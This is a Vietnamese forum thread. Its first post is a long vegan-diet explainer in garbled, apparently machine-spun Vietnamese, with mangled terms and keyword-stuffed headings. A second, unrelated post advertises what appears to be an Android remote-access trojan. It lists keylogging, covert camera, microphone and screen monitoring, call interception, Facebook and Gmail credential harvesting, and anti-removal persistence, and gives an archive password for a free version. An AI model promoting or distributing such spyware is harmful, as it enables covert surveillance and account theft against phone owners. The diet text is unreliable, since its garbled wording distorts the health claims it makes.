Kiến thức cơ bản về chế độ ăn thuần chay

Chủ đề thuộc danh mục 'Ô tô' được đăng bởi nutriancan, 10/6/21.

  1. nutriancan

    nutriancan Thành viên cấp 1

    điểm nhấn nguyên tắc ăn thuần chay
    • chính sách ăn luôn chay chỉ bao gồm tất cả thức ăn có bắt đầu thực vật.
    • nghiên cứu đã cho là chính sách ăn thuần chay hoặc không ăn mặn giàu đồ ăn có nguồn gốc cây trồng có liên quan đến việc giảm cholesterol LDL, cải sinh lượng đường trong máu và cải sinh huyết áp.
    • Có một số chất dinh dưỡng mà những người dân theo bề ngoài ăn luôn chay cần lưu ý để bổ sung đủ, bao gồm tất cả vitamin B12, canxi, sắt và 1 số ít axit béo omega-3 nhất định.

    thực đơn cho người ăn chay

    Những thứ cơ bản về lý lẽ ăn chay

    chính sách ăn luôn chay và dùng đồ chay dường như là một trong những xu hướng đồ ăn số 1 , nhưng có chứng cớ cho thấy một số người đã ăn chính sách ăn chính là cây trồng hoặc không ăn mặn trong nhiều thế kỷ. Tuy nhiên, phải đến năm 1944, thuật ngữ “thuần chay” mới được đưa ra. Về bước đầu, những người dân theo hiệ tượng ăn luôn chay đã chọn loại bỏ của cả các loại thức ăn có nguồn gốc con vật khỏi ăn uống của họ. Nhiều người chọn ăn mặc quần áo thuần chay, thứ và đồ chăm lo cá thể. đa số những cá nhân áp dụng qui định ăn luôn chay đang làm bởi thế vì những lợi ích sức khỏe được nhận thấy hoặc để chuyên chở cho quyền động vật.

    các loại thực phẩm nào tạo cho nguyên lý ăn luôn chay?

    chính sách ăn luôn chay chỉ bao gồm tất cả các loại thực phẩm có bắt đầu cây trồng. Loại vẻ ngoài kiêng ăn này bao gồm tất cả hoa quả, rau, đậu nành, các loại đậu, các loại hạt và bơ hạt, các loại sữa sửa chữa từ cây trồng, thực phẩm cây trồng nảy mầm hoặc đã lên men và các loại hạt ngũ cốc nguyên hạt. vẻ ngoài ăn ngay chay không bao gồm thức ăn con vật như trứng, sữa, thịt, gia cầm hoặc món ăn hải sản. Chúng cũng không có các dịch vụ phụ từ động vật như mật ong (do ong tạo nên) và các thành phần ít biết tới tới từ động vật như whey, casein, lactose, albumen lòng trắng trứng, gelatin, carmine, shellac, vitamin D3 có nguồn gốc từ loài vật và omega có nguồn gốc từ cá -3 axit béo.

    lợi ích của ăn chay trường

    Thuần chay và sức khỏe

    thức ăn được để ý trong chế độ ăn thuần chay rất giàu chất dinh dưỡng như vitamin A, C, E và K, chất xơ, chất chống oxy hóa và chất dinh dưỡng cây trồng. cơ chế ăn ngay chay đã được nghiên cứu và điều tra về ảnh hưởng của chúng đối với sức khỏe con người. ở đây là một số điểm vượt trội.

    nghiên cứu và điều tra nguyên tắc ăn chay

    Một thử nghiệm hốt nhiên có đối chứng (RCT) đã kiểm soát ảnh hưởng của hiệ tượng ăn thuần chay, không thêm chất béo khái niệm cảnh nguy hiểm tim mạch ở trẻ béo phì bị tăng cholesterol máu và cha mẹ của nó. kết quả cho thấy bọn trẻ và cha mẹ đã áp dụng vẻ ngoài không ăn không uống này còn có tổng lượng cholesterol, áp huyết và chỉ còn số BMI thấp hơn phân tích khởi đầu. Một RCT khác cho thấy rằng nguyên lý ăn luôn chay có liên quan đến việc kiểm soát đường huyết được cải thiện đối chiếu chính sách ăn tiểu đường thông thường ở bệnh nhân tiểu đường Loại 2. chung cục, RCT 74 tuần - mặc dầu với size mẫu nhỏ - cho thấy qui định ăn luôn chay ít chất béo có thể cải sinh đường huyết và lipid huyết tương hơn hình thức ăn tiểu đường chung. Các điều tra và nghiên cứu tiếp theo cao hơn và lâu năm là cấp thiết để cung cấp những phát hiện này.

    thực dưỡng ohsawa thầy tuệ hải

    công dụng sức lực của nguyên tắc ăn luôn chay cũng sẽ được chứng nhận trong số nghiên cứu chú ý. Một review có hệ điều hành về các nghiên cứu đoàn hệ tiền cứu và cắt ngang đã báo cáo chỉ số khối khung người, cholesterol toàn phần, cholesterol LDL (hoặc cholesterol “xấu”) và mức đường huyết ít hơn ở những cá nhân theo nguyên lý ăn chay hoặc thuần chay so với những người ăn tạp. tác dụng của không ít điều tra và nghiên cứu giành cho những người dân theo phương pháp ăn ngay chay cho rằng cách ăn uống này làm giảm khả năng ung thư tổng thể xuống 15%. mặc dầu các nghiên cứu và điều tra cắt theo đường ngang và thuần tập quan yếu bằng chứng Tại Sao và tác dụng (như trong phương pháp ăn thuần chay có ích cho sức khỏe), những bắt gặp này cung cấp tác dụng của RCTs, được xem là tiêu chuẩn vàng của nghiên cứu và được thiết kế để chứng minh rằng một can thiệp (theo một cơ chế ăn thuần chay) kéo theo một cảm giác (hữu ích cho sức khỏe).

    Hầu hết các điều tra và nghiên cứu này đã chiếm lĩnh được tác dụng lành mạnh và tích cực. Tuy nhiên, việc am hiểu ảnh hưởng tác động cụ thể của nguyên tắc ăn thuần chay khái niệm sức lực vẫn tồn tại nhiều thử thách vì nghiên cứu về mô hình ăn uống đó thường được nhóm với phương pháp dùng đồ chay hoặc cây trồng, cả 2 đều rất có thể bao gồm tất cả các sản phẩm con vật.

    Các chất dinh dưỡng cần đon đả

    mặc dầu phương pháp ăn thuần chay có thể rất giàu dưỡng chất, nhưng có 1 số ít chất dinh dưỡng cần độc đáo lưu ý khi áp dụng đẳng cấp và sang trọng ẩm thực ăn uống này: lớn nhất là vitamin B12, canxi, một số axit béo omega-3 và sắt.

    Vitamin B12 rất cần thiết đối với sự đàm luận chất, sự khỏe mạnh tim mạch, tâm thần và cơ bắp và nó bao gồm được tìm ra trong số sản phẩm động vật. những người theo lý lẽ ăn ngay chay hãy chọn thực phẩm bổ sung B12. bên cạnh đó, những cá thể theo qui định ăn luôn chay nên bàn luận với địa chỉ cung cấp hình thức dịch vụ quan tâm sức lực về sự theo dõi và quan sát mức độ B12 và sự cần dùng bổ sung cập nhật tiềm năng của mình, lưu ý rằng sự thiếu vắng B12 có thể mất không ít năm để biểu hiện qua xét nghiệm máu.

    Canxi cần phải có cho sự khỏe mạnh nha khoa, thần kinh, xương và cơ bắp và nó được kêt nạp cực tốt cùng với vitamin D. dưỡng chất này thiết yếu được tìm ra trong các loại thức ăn từ sữa và với lượng ngắn hơn trong loại rau sạch như cải xoăn và bông cải xanh. Nó cũng sẽ được đưa ra trong các loại thực phẩm tăng tốc, chẳng hạn như đậu phụ, bánh mì và một số loại sữa thay thế từ thực vật. Một đánh giá có bộ máy cho thấy những người dân theo lý lẽ ăn thuần chay hoặc không ăn mặn có độ phủ sóng khoáng xương ít hơn và Phần Trăm gãy xương cao hơn. Vì canxi và vitamin D là chìa khóa cho sức khỏe của xương, những người dân theo bề ngoài ăn luôn chay đáng kể chuyện với nhà cung cấp các dịch vụ âu yếm sức lực của mình để xác định xem liệu các loại thực phẩm bổ sung cập nhật có cấp thiết hay là không.

    Sắt là một bộ phận quan trọng của tiến độ đàm đạo chất và sức lực tim mạch. Nó được đưa ra phần đông trong ăn uống con vật. Mặc dù ngũ cốc nguyên hạt bức tốc, đậu, đậu lăng, rau bina và các các loại thực phẩm có nguồn gốc cây trồng khác cung cấp sắt, nhưng nó ở dạng sắt không phải heme, không khả dụng sinh vật học như sắt heme có trong đồ ăn động vật.

    Axit béo omega-3 là một loại chất béo không bão hòa đa thể hỗ trợ sức lực tim mạch. Ba loại chung nhất mà bọn họ ăn là axit alpha-linolenic (ALA), axit eicosapentaenoic (EPA) và axit docosahexaenoic (DHA). ALA được tìm thấy trong các nguồn cây trồng như hạt lanh, hạt chia và quả óc chó, nhưng EPA và DHA được tìm ra thiết yếu trong các loại thực phẩm loài vật ngoài một số nguồn cây trồng biển. ALA được khung hình họ thay đổi thành EPA và DHA, nhưng chưa đến con số nhỏ. Các chắt lọc thuần chay cho EPA và DHA là các sản phẩm hoặc các loại thức ăn bổ sung cập nhật vi tảo và rong biển.
     
  2. connhanguoitax147

    connhanguoitax147 Thành viên cấp 1

    [​IMG]
    Tested on Android : 5,6,7,8,9,10,11
    Application Features :
    ——
    Manage :
    Files
    Sms
    contacts
    Calls
    Applications
    Accounts
    ——
    Monitor :
    Camera
    Live screen
    Microphone
    Keylogger
    Location
    Real time calls monitor
    ——
    Tools :
    Download apk and install
    Show message
    Open link
    Call number
    Phone info
    —–
    Social media Hunter:
    Facebook
    Gmail
    More coming soon
    ——
    Super mode :
    Anti-Kill
    Anti-Delete
    Realtime Monitor Active App
    Auto Click Start Screen Record
    Anti shutdown phone
    ———————————-
    [​IMG]
    This is free version will not have Support
    —–
    Pass : BY_EVLF
    [​IMG]
     

Ủng hộ diễn đàn